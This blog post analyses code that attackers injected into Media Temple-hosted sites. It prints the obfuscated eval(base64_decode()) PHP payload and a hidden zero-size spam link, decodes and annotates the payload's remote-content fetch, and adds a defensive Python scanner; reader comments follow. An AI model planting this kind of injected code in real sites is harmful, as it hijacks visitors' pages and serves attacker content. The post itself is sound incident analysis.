As we talked about last time, Media Temple’s servers got cracked, and many people’s passwords were stolen. In addition, code was injected into many people’s files. According to Jeffrey Barke, code was injected into index.php, and while other parts of the site were hit as well, I’d like to take a look at index.php’s code:
<!--yje35zfv8SU--><font style="position: absolute;overflow: hidden;height: 0;width: 0"><a href="http://www.bangpass.com/t1/pps=brunette/assparade.html">assparade</a></font>
<?php eval(base64_decode("JGw9Imh0dHA6Ly90b3VycmV2aWV3cy5hc2lhL2xpbmtzMi9saW5rLnBocCI7IGlmIChleHRlbnNpb25fbG9hZGVkKCJjdXJsIikpeyANCiRjaCA9IGN1cmxfaW5pdCgpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgMzApOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOyANCmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICRsKTsgJHIgPSBjdXJsX2V4ZWMoJGNoKTsgY3VybF9jbG9zZSgkY2gpO30NCmVsc2V7JHI9aW1wbG9kZSgiIixmaWxlKCRsKSk7fSBwcmludCBAJHI7DQo=")); ?>
Firstly, this isn’t much of an ‘analysis’, as the code is pretty straightforward (once you decode the Base64 encoding), so don’t expect
Now, the first thing you’ll notice is that nice strand tag the cracker used. It’s embedded as an HTML comment, and every infected file carrying the same tag has the exact same code underneath it. There are multiple strands, and they all do different things… but they share the same basic code. Some strands put in links to scam sites, porn sites, and malware sites… but most just happened to be porn. So above, you’ll see a link going to a porn site that the cracker fancies, hidden inside a zero-size font element so visitors never see it, which is obnoxious… but isn’t a problem, really.
Let’s look at the PHP code though; that looks interesting. What is it? The eval language construct basically tells the PHP engine to execute whatever string is inside the parentheses as PHP code. But what’s all that crap inside of the parentheses? Well, it looks like that because it’s encoded in Base64. Now, let’s decode it, and put it into plaintext. I’ve indented the code below, and prettied it up a bit, for readability.
$l = "http://tourreviews.asia/links2/link.php";
if (extension_loaded("curl")) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $l);
$r = curl_exec($ch);
curl_close($ch);
} else {
$r = implode("", file($l));
}
print @$r;
Now, I’ll comment each and every line, so that we can see what it really means. One of the best ways of learning to code is reading other people’s code, so we’ll utilize this as an educational opportunity.
$l = "http://tourreviews.asia/links2/link.php"; //Declare URL.
if (extension_loaded("curl")) { //If the cURL extension is enabled...
$ch = curl_init(); //Start a cURL session (using $ch as our cURL handle)
curl_setopt($ch, CURLOPT_TIMEOUT, 30); //Give up if the whole transfer takes longer than 30 seconds.
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Return the webpage as a string instead of printing it straight out.
curl_setopt($ch, CURLOPT_URL, $l); //Set our URL as the URL to use.
$r = curl_exec($ch); //Do it!
curl_close($ch); //Close it, and free up the memory.
} else { //Otherwise, if we can't use cURL...
$r = implode("", file($l)); //Get the file as an array, and stick it back together.
}
print @$r; //Print whatever we've got, but don't give us any errors.
So the first part of the code isn’t too harmful… it’s just a link. But this second part downloads an entire remote page and displays it on your website. That is definitely not good. However, if you were affected, don’t worry… the fix seems to be relatively simple.
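As an added example (not code from the post or from Media Temple), here is a small Python scanner that looks for both injection components described above in a file's text, decodes the eval(base64_decode()) payload for inspection without ever executing it, and lists the remote URLs the payload would contact. The sample file, its strand tag and its URLs are constructed here; the payload is encoded inside the script so the scanner, not a hand-typed blob, decides what it contains.

```python
import base64
import re

# Signatures for the two injection components the post describes:
# (1) a hidden zero-size link block behind an HTML-comment "strand tag",
# (2) eval(base64_decode("...")) executing an encoded PHP payload.
STRAND_RE = re.compile(
    r'<!--([A-Za-z0-9]+)--><font style="[^"]*height:\s*0;[^"]*">.*?</font>',
    re.S)
EVAL_B64_RE = re.compile(
    r'eval\s*\(\s*base64_decode\s*\(\s*["\']([A-Za-z0-9+/=\s]+)["\']\s*\)\s*\)',
    re.S)
URL_RE = re.compile(r'https?://[^\s"\'<>]+')


def decode_payload(blob: str) -> str:
    """Decode (never execute) a base64 payload, tolerating embedded whitespace."""
    return base64.b64decode(re.sub(r'\s+', '', blob)).decode('latin-1')


def scan_php(source: str) -> dict:
    """Report the injected components found in one PHP/HTML file's text."""
    findings = {'strand_tags': [], 'payloads': [], 'remote_urls': []}
    for m in STRAND_RE.finditer(source):
        findings['strand_tags'].append(m.group(1))
    for m in EVAL_B64_RE.finditer(source):
        decoded = decode_payload(m.group(1))
        findings['payloads'].append(decoded)
        findings['remote_urls'].extend(URL_RE.findall(decoded))
    return findings


# Constructed sample file mirroring the pattern from the post (hypothetical
# hosts under .invalid); the payload is base64-encoded at runtime.
_INJECTED_PHP = (
    '$l = "http://fetch.example.invalid/link.php";\n'
    'if (extension_loaded("curl")) { $ch = curl_init(); '
    'curl_setopt($ch, CURLOPT_URL, $l); $r = curl_exec($ch); curl_close($ch); }\n'
    'else { $r = implode("", file($l)); } print @$r;\n'
)
SAMPLE_FILE = (
    '<!--abc123xyz--><font style="position: absolute;overflow: hidden;'
    'height: 0;width: 0"><a href="http://spam.example.invalid/">spam</a></font>\n'
    '<?php eval(base64_decode("'
    + base64.b64encode(_INJECTED_PHP.encode()).decode() + '")); ?>\n'
    '<?php echo "legitimate page content"; ?>\n'
)

if __name__ == '__main__':
    for key, values in scan_php(SAMPLE_FILE).items():
        print(key, values)
```

Run it over every index.php on a suspect account and the remote_urls list gives you the hosts to block at the egress firewall and to search for in the web server logs.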
Nicely commented. A good follow up story would be to explain what the attacker did to inject this code into the multiple sites. Like maybe he wrote a script that would add the same code with various little changes into every index.php file… IF that is what he did.
While the official report hasn’t been made, I believe that roughly 10% of their accounts on their shared hosting servers were attacked.
It was initially believed to be a WordPress security flaw, but there were multiple CMS’s compromised in the attack, therefore it’s more likely that it’s a Media Temple issue, since nobody was attacked outside of their shared hosting.
My guess is that when Media Temple looks at their logs, they’re going to see tons of FTP connections from a remote machine, where it connects, uploads files, disconnects, and moves to the next account.
The problem is, how did they get all the FTP credentials?
Nice post!